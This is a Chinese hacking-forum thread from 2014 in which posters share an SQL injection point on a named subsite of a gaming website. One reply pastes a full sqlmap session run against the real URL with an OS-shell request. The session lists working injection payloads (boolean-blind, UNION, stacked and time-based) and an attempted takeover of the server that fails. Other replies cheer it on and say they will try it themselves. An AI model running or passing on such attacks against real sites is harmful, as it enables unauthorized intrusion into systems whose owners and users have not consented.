社区首页 › 漏洞情报 › 游戏风云某分站注入点一枚

nick2011 发表于 2014-11-15 11:42:57

嗯，不错vuo      

now 发表于 2014-11-15 12:15:38

怎么厉害= =！

C4r1st 发表于 2014-11-15 12:19:30

是不是发错板块了？

now 发表于 2014-11-15 12:38:55

不是root拿J8

root@kali:~# sqlmap -u http://ls.gamefy.cn/detail.php?id=13 --os-shell

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:40:57

resuming back-end DBMS 'mysql'
testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13 AND 4788=4788

    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: id=-4963 UNION ALL SELECT 48,48,48,48,48,48,48,48,48,CONCAT(0x7162676f71,0x414144674654756a6c51,0x71666c6c71),48,48,48,48,48,48,48,48,48#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=13; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=13 AND SLEEP(5)
---
the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
fingerprinting the back-end DBMS operating system
the back-end DBMS operating system is Linux
time-based comparison requires larger statistical model, please wait..............................
it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
testing if current user is DBA
fetching current user
in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
functionality requested probably does not work because the curent session user is not a database administrator
what is the back-end database management system architecture?
32-bit (default)
64-bit
>
checking if UDF 'sys_eval' already exist
checking if UDF 'sys_exec' already exist
detecting back-end DBMS version from its banner
retrieving MySQL base directory absolute path
it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail

乐生乐道 发表于 2014-11-15 12:54:24

:D看看怎么突破的

Lzzh 发表于 2014-11-15 12:55:51

evil，支持啊。。。

ghost97 发表于 2014-11-15 13:55:12

看看注入点。

zhoujian017 发表于 2014-11-15 14:00:50

赶紧来试试

xenon 发表于 2014-11-15 14:03:40

支持，顶楼主

契约 发表于 2014-11-15 14:47:58

不会连DB权限都木有吧

查看完整版本: 游戏风云某分站注入点一枚